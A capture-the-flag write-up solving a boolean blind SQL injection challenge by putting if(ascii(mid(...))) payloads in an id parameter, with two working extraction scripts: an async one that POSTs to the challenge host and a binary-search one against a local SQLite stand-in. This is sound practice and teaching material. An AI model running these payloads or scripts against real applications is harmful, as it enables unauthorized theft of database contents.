image-20260315182333958

The challenge hands you the table name and column name holding the flag as soon as you land on the page. Entering `1` shows "Hello, glzjin wants a girlfriend."

image-20260315182559934

Entering `2` shows **Do you want to be my girlfriend?**

image-20260315182917629

After a few more attempts:

image-20260315183115083

image-20260315183129327

Comment sequences are all filtered. Thinking back to how `1` and `2` produce different output, this is a boolean oracle: any expression that evaluates to `1` or `2` in the `id` position tells us one bit of truth through which sentence comes back. So I tested with the `if` function:

image-20260315183338954

image-20260315183359413

It really does produce different results depending on the condition. Since the column name and table name were both given, test with `if(ascii(mid((select(flag)from(flag)),1,1))>0,1,2)` (parentheses stand in for spaces so the subquery needs none):

image-20260315184216074

It correctly outputs the sentence corresponding to `1`, so the first byte of the flag has an ASCII value greater than 0 and the injection works end to end. Since this is boolean-based blind injection, nobody is going to test byte by byte by hand, so the next step is a script.

```python
import asyncio
import aiohttp

# target URL; the port is elided in the original and stays that way
url = "http://node4.anna.nssctf.cn:xxxxx/index.php"
# at most 20 requests in flight at once
sem = asyncio.Semaphore(20)


async def solve(session, pos, c):
    """Ask the server one boolean question: is the pos-th byte of the flag == c?
    Returns chr(c) on a hit, else None."""
    async with sem:
        x = "select(flag)from(flag)"
        payload = {
            # evaluates to 2 when the byte matches -> "Do you want to be my girlfriend?"
            # evaluates to 1 otherwise             -> "Hello, glzjin wants a girlfriend."
            "id": f"if(ascii(mid(({x}),{pos},1))={c},2,1)"
        }
        # print(payload['id'])
        async with session.post(url, data=payload) as resp:
            text = await resp.text()
        return chr(c) if "Do you want to be my girlfriend?" in text else None


async def main():
    async with aiohttp.ClientSession() as session:
        for pos in range(1, 1000):
            # one request per printable ASCII candidate for this position
            tasks = [asyncio.ensure_future(solve(session, pos, c)) for c in range(32, 127)]
            found = None
            for task in asyncio.as_completed(tasks):
                result = await task
                if result:
                    found = result
                    print(result, end="", flush=True)
                    # hit: cancel the remaining candidates for this position
                    for t in tasks:
                        if not t.done():
                            t.cancel()
                    break
            if found is None:
                # no candidate matched: we are past the end of the flag
                break
    print()


if __name__ == "__main__":
    asyncio.run(main())
```
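The script above sends one request per candidate byte (95 per position). The same oracle answers `>` questions just as well as `=` questions, so each byte can be found by binary search in about 7 requests. The following is an added example, not the original writeup's script: it runs the binary-search extraction against a local SQLite stand-in for the challenge so it works offline. The `flag`/`flag` table and column, the two response strings and the shape of the `if(ascii(mid(...)))` oracle come from the page; the `users` table, the sample flag value and the SQLite builtins (`CASE`/`substr`/`unicode` standing in for MySQL's `if`/`mid`/`ascii`) are assumptions.

```python
# Added example (not the page's own code): boolean blind SQLi extraction by
# binary search, against a constructed SQLite stand-in for the target.
import sqlite3

TRUE_MSG = "Do you want to be my girlfriend?"   # returned when id evaluates to 2
FALSE_MSG = "Hello, glzjin wants a girlfriend."  # returned when id evaluates to 1
SAMPLE_FLAG = "flag{constructed_sample_flag}"     # constructed test value (assumption)


def _build_db() -> sqlite3.Connection:
    """Assumed schema: a users table keyed by id and the flag table from the page."""
    conn = sqlite3.connect(":memory:")
    conn.executescript(
        "CREATE TABLE users(id INTEGER, msg TEXT);"
        "CREATE TABLE flag(flag TEXT);"
    )
    conn.execute("INSERT INTO users VALUES (1, ?), (2, ?)", (FALSE_MSG, TRUE_MSG))
    conn.execute("INSERT INTO flag VALUES (?)", (SAMPLE_FLAG,))
    return conn


_DB = _build_db()


def vulnerable_app(user_input: str) -> str:
    """Stand-in for the target: id is concatenated into the query unsanitised,
    which is the bug the writeup exploits."""
    row = _DB.execute(f"SELECT msg FROM users WHERE id = {user_input}").fetchone()
    return row[0] if row else ""


def oracle(pos: int, threshold: int, send=vulnerable_app) -> bool:
    """One yes/no question: is ascii(flag[pos]) > threshold?
    MySQL form from the page: if(ascii(mid((select(flag)from(flag)),POS,1))>N,2,1)
    SQLite equivalent used here (assumption: same shape, different builtin names)."""
    payload = (
        f"CASE WHEN unicode(substr((SELECT flag FROM flag),{pos},1))>{threshold} "
        f"THEN 2 ELSE 1 END"
    )
    return TRUE_MSG in send(payload)


def extract(send=vulnerable_app, max_len: int = 200) -> str:
    """Recover the flag byte by byte, binary-searching printable ASCII 32..126.
    The page's own `> 0` test marks the end: past the last byte, substr gives ''
    and unicode('') is NULL, so the CASE yields 1 (MySQL's ascii('') is 0, same
    outcome)."""
    out = []
    for pos in range(1, max_len + 1):
        if not oracle(pos, 0, send):   # no byte here: end of the flag
            break
        lo, hi = 32, 126
        while lo < hi:
            mid = (lo + hi) // 2
            if oracle(pos, mid, send):  # byte > mid
                lo = mid + 1
            else:
                hi = mid
        out.append(chr(lo))
    return "".join(out)


if __name__ == "__main__":
    print(extract())
```

Swapping `send` for a function that POSTs the payload as the `id` parameter (with the page's MySQL spelling of the expression) turns this into the same attack against the real target, at roughly 8 requests per character instead of 95.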

Running it prints the flag:

image-20260315184638144